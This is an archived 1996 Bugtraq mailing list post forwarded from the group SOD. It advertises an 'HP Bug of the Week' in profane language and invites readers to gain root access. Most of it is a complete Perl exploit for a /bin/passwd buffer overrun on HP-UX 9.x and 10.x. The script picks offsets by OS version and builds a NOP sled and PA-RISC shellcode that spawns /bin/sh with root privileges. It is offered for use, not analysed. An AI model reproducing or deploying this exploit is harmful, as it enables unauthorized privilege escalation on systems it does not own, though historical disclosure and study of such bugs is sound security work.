[3674] in bugtraq
HP Bug of the Week!
daemon@ATHENA.MIT.EDU (Aleph One)
Sat Nov 23 10:14:12 1996
Date: Sat, 23 Nov 1996 08:19:34 -0600
Reply-To: Aleph One <aleph1@dfw.net>
From: Aleph One <aleph1@dfw.net>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
From our SOD friends (http://command.com.inter.net/~sod/); Press D now if
you are easily offended:
This week: If I had a life, I wouldn't spend my Friday nights giving
you bugs
Good fuckin' day, eh? Welcome to the HP Bug of the Week -- if you
haven't come here looking for security holes to HP/UX computers,
you've come to the wrong fucking place. Otherwise look no further
because you've found the fuckin' mecca of the fuckin' desert. Our goal
here is to distribute those HP bugeridoo's as far and wide as is
fucking humanly possible, so tell a friend if you have one. We've got
a root hole from a buffer overrun in /bin/passwd this week, plus a
whole new section called "Other Folks Scripts" that rakes in the
wonderful works of other net.scriptors. So come on in, look around,
take all you want but eat all you take and as always, start clicking
your way to root access with scripts from the motherfuckin' folks at
SOD.
Vulgarity rating: 6 (scalawag)
Caveat Emptor
passwd is broked script for this week
#!/usr/bin/perl
# SOD /bin/passwd buffer overrun
use FileHandle;
sub h2cs {
local($stuff)=@_;
local($rv);
while($stuff !~ /^$/) {
$bob=$stuff;
$bob =~ s/^(..).*$/$1/;
$stuff =~ s/^..//;
$rv.=chr(oct("0x${bob}"));
}
return $rv;
}
open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;
if ($rev eq "10") {
$offset=2102;
$prealign="AA"; # 2 byte pre
$postalign=""; # 0 byte post
$pcoq=h2cs("7b03b463");
} else {
$offset=2170; # 2170 works for 9.X...
$prealign=""; # zero byte pre
$postalign="PP"; # 2 byte post
$pcoq=h2cs("7b033018");
}
$nop=h2cs("08210280");
$code="";
$code.=h2cs("34160506"); # LDI 643,r22
$code.=h2cs("96d60534"); # SUBI 666,r22,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0
$code.=h2cs("e83f1ffd"); # BL .+8,r1
$code.=h2cs("08210280"); # NOP
$code.=h2cs("34020102"); # LDI 129,rp
$code.=h2cs("08410402"); # SUB r1,rp,rp
$code.=h2cs("60400162"); # STB r0,177(rp)
$code.=h2cs("b45a0154"); # ADDI 170,rp,arg0
$code.=h2cs("0b390299"); # XOR arg1,arg1,arg1
$code.=h2cs("0b180298"); # XOR arg2,arg2,arg2
$code.=h2cs("341604be"); # LDI 607,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("96d60534"); # SUB 666,r22,r22
$code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails
$data="/bin/sh."; # Data stuff
$codedata=$code.$data;
$num=int(($offset-length($code)-length($data)-4)/4);
$pre="$nop"x$num;
$of=$prealign;
$of.=$pre.$code.$data.$postalign.$pcoq;
exec("/bin/passwd","$of");
Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
